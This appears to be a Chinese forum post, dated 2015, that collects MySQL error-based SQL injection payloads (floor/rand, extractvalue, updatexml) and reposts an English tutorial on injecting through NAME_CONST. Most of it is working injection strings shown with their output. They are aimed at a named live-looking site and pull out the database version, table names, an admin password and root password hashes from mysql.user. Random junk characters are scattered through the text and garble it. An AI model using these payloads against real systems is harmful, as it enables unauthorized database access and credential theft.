|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:. s, z2 U$ S/ ~! u) ~$ ]# d+ Y$ f
首先进行正常查询: mysql> select * from article where id = 1;
2 _' i! A$ B3 ?* f+—-+——-+———++ `0 Q/ W( w q
| id | title | content |
8 z* a1 ]3 _- ?3 i' a4 A6 X5 A: P+—-+——-+———+3 Q% f: n3 Q0 v
| 1 | test | do it |
+ s# Q9 ~9 d. W4 u0 W+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
* i- e2 D* {# nERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。; W, `- M0 G7 K O
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);' x7 |( ^2 w6 H: r, f% w
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
. {. n: v* p5 ]5 c6 _% bERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue8 D) H2 \5 T# I/ Q v
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–) E6 a: }, a- `
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
- r" }7 H f9 U' k6 q% o, r- K* t& I5 I& _2 n+ I: ^* Q6 Y
再收集:
9 L/ {% p& s. i- }http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) . v+ d* M$ W' y7 A. S
5 g# y$ T L! }7 u8 u ?
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’, a9 l9 l. F2 f/ A m
9 h* n7 j/ Q ~2 G0 w6 F/ b3 Yhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
; `7 g+ T% |* p9 ?6 P$ `- c- H4 e' W9 G: k0 ]3 V& s
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ + c; D) }. a" M" P8 l4 u
1 J) L9 Y( O! k3 h* R: CMYSQL高版本报错注入技巧-利用NAME_CONST注入2 u7 L" x) F6 J4 e- I
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 6 j* W$ G/ y+ p0 \! }7 \& k6 w+ B
4 d, t$ e! v( H: f* T7 S
% T- {# J; `0 V/ f
相关信息
/ ^) F: z" ]0 m9 }9 v% k3 R. x4 ^2 o0 e0 k1 m6 Y3 K
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
9 ` z8 F$ r3 b8 g1 w/ m4 Z$ \1 U4 v$ l* A& j' ^+ P5 I" k2 s
Code:
; J8 ~4 x# K5 k) C# j% l- C. m& hNAME_CONST(DATA, VALUE)7 h' S1 R. ~8 A6 ]$ _
2 A1 T! n+ ]& K$ D) V, fReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
' y' Y" g; p. }3 z( V& w! x
8 d+ e0 q$ G2 R- d% J: pSELECT NAME_CONST('TEST', 1)- O" d* O" V* b
& n; Y! [3 w& ^$ l: W
; q' L7 w& p( O. U9 v2 U: u
0 p! D1 t: v8 \0 N& [|---------------|
8 [0 L- b! M! ~, s3 X* u; |: m| TEST |
5 s5 j" F8 x/ ]5 I| | G% Y/ Q. z ~/ G
|---------------|$ @" C d& l$ s! ^
| 1 |
: F* {' Z0 l. P8 f1 Y/ J, y9 F3 }: D| |
0 ~5 t/ _7 J6 g# @0 T|---------------|
, x/ G6 s2 @) Z. M3 W @$ _
5 I: E5 }& q' p1 Z7 Y! L9 {9 Y. m9 E, s$ I6 K
2 L7 H; A3 R, v" i4 k
# Z1 `9 O2 {, l/ ~ ~6 c+ C/ R
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
- T/ h1 X/ N' zIntro to MySQL Variables
+ f( g3 p3 y6 A7 I8 K" l
, z. H% V+ H; k- P. pOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
6 m }7 |5 i4 E
" n/ z& a5 V& U7 e* v0 W5 v( C) ]. O/ aCode:7 c1 a% h5 x* X4 r5 M0 W( g, d
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261/ B1 i4 c" R6 v+ U! z: V
3 ?# w3 s i x0 y1 S
* g) \- U6 T4 E% t) Z
7 d) Z; {1 I1 ~4 H9 @! V
, j1 O, t+ Y: e9 P2 h# I9 I( v6 S4 J# C) L! {4 F
Code:
" x, T T$ }1 M# K" ]' _% }1 v+ kand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
Z1 y3 H6 B7 M2 a% u( ]2 h& E: _6 a2 L& c
- Y$ x4 `$ Z( H4 S
VAR = Your MySQL variable.! e' d# M: _. `, m) r1 r3 l
[ W8 I, U) Y8 z
MySQL 5.1.3 Server System Variables8 G: U! H# y5 _$ q4 A" R5 M& D2 r
" z5 S$ I' i' L2 q; \9 Q: x
Let's try it out on my site..
4 x3 U$ B+ J3 u2 @/ B2 v% N5 z6 v; A; [$ V! R& {
Code:
6 _. X8 K7 d8 @& e$ J6 Ohttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--" v- F8 C. \! m
/ A% E8 m2 M# I. l: AErroruplicate column name '5.0.27-community-nt'
# I6 y: u' T' T3 E6 Z
f K, m$ V( N3 A3 w$ M3 c) s
" u a: U6 q1 v; A8 u% h. }( b6 s9 A- m4 s# C3 F, q5 a
( A O+ H7 }3 f! j
- h. d e) [ R2 _Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...) @. x$ ~2 f9 m
# Y: Y+ Z f5 ?* o2 L- B G
Data Extraction
6 R& m- Y- x4 F1 R( I6 f. B4 F0 [' q+ `# j I
Code:9 i( U5 Q8 j# f' L- k
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
, Z9 s) g! H1 }$ }. c" w: a; q( e$ I" F% ]$ U; X2 F
v1 K4 G$ K% M* G/ }4 T, g, BWe should get a duplicate column 1 error...7 _3 E' n- B3 F, j2 ~) [- y: n
1 W: k8 A, W7 F* N1 |
Code:( T$ P; r6 A! |; _/ h1 u
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--7 }6 O+ G2 _5 r/ B( @( ]
6 `3 m" j# Y$ H9 |6 o- g( z) }Erroruplicate column name '1
$ j2 B$ I' ~6 }9 g) r3 A) Z% P& K) x8 v! P# z3 |
- c/ k/ G- b5 K( K9 M! F
7 n) J9 P' }2 M4 R8 |
/ p! K0 p. J) q" j0 o7 k7 C* b' i1 S/ J- Q4 ]/ A3 l% |% c L
) N+ K6 f! p$ o2 P- G
Now let's get the tables out this bitch../ N+ l. T2 H& ]7 L4 P0 @4 S
/ z# @* ?, a" S8 F5 O j% t
Code:3 R+ f. z, I9 A y! L& {
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
4 L( k+ m0 K( S" v9 b1 S6 S5 p' Z9 K5 P7 Y4 S7 q' x$ h
, V/ M; I: P3 F% h+ x6 J4 k9 pLet's see if it works here, if it does, we can go on and finish the job.# r- [' j$ g* J3 d! [* @
! O; j/ V2 f' ^& N2 e( I! D1 |Code:
9 j: k2 N& `) m* @$ e: c9 H8 b! U7 Ohttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--5 h# E; s8 X5 {5 [7 a
& Z9 P! t! Z, @) `. e# z8 H# l* a9 ]2 N9 \% a& j4 M# X
Erroruplicate column name 'com_admanage% V: B! U# U7 M4 d
! P9 s" c. C3 P8 s8 @
' E. ]8 p0 U9 q2 X
( I: E g4 G# x4 x) F) F: `' Z( j
' O$ v* K; w, u7 e' B4 V( i P$ x+ W% |
0 T0 j6 `6 c8 S9 h) m$ w9 k$ z
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
9 M3 x+ f0 z; \8 v, T/ D6 c& p
; K3 p2 s. {% hLet's get the columns out of the user table..4 R; X; W: Y u+ a! n
2 n$ G. F' X9 @Code:" G* e* [8 l0 D$ P. A
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--. N+ C: V& n* Y5 D7 U1 S# o% X
1 [& o# N% K2 l( J! Q2 T% X/ _& s% T! K* b7 ?. v( S* y
So mine looks like this, and I get the duplicate column name 'Host'.
* V7 }$ ^/ |" d( R" W0 u( ?2 S. u. w# N: n1 x5 J- d' j/ l
Code:3 ^! `# B+ W% P; H) x G+ s4 O
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--. ?; D8 Z% B8 g' [ v: ?5 Y
8 A: M H* H) x4 o
Erroruplicate column name 'Host'
7 z o6 n& `& c* r
0 j) I) K1 s( k$ L. i/ O* A# c
, a/ W N1 ^, f$ H2 Y9 M0 X9 Y! Y( A& S, m; T
2 E- v: r6 H) F; b" ~& ]/ r
8 {" q R+ Q) W. c9 \
5 o- V/ y" k( \1 I) P; ~1 }Woot, time to finish this bitch off.
4 Q( q* A/ b. }' }; N" ^
* C5 k* e9 N+ M) V( n. ]Code:' W3 W" `1 _6 S4 x) K
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--% a. X! F! V5 ]/ L' t+ K' I
+ c: R# B% |1 s6 s# l* s# a; W1 O0 g' y7 O
So mine looks like this..." p5 S1 v+ X% H# F
' w* U& Y8 L$ w. ]; @4 mCode:. d9 Z$ d: e% s y; S* c
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--. S& o" [' v$ ^3 t
0 j' q& n) t/ b) u- B
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'- m/ T4 J) H2 c: N3 p
( U: s/ G6 F8 I( w4 E* t& k) v( Y; P& o7 e
7 }( b: n3 r, ^7 Z* ^0 K3 e C* O' t
6 f; Y/ } q% W) B2 r( t0 \4 c) V
And there we have it, thanks for reading.
! G+ V0 w5 Y4 J) F4 i6 x: f' B7 s% ~2 K: [
|
发表于 2015-11-11 19:03:37
收藏
支持
反对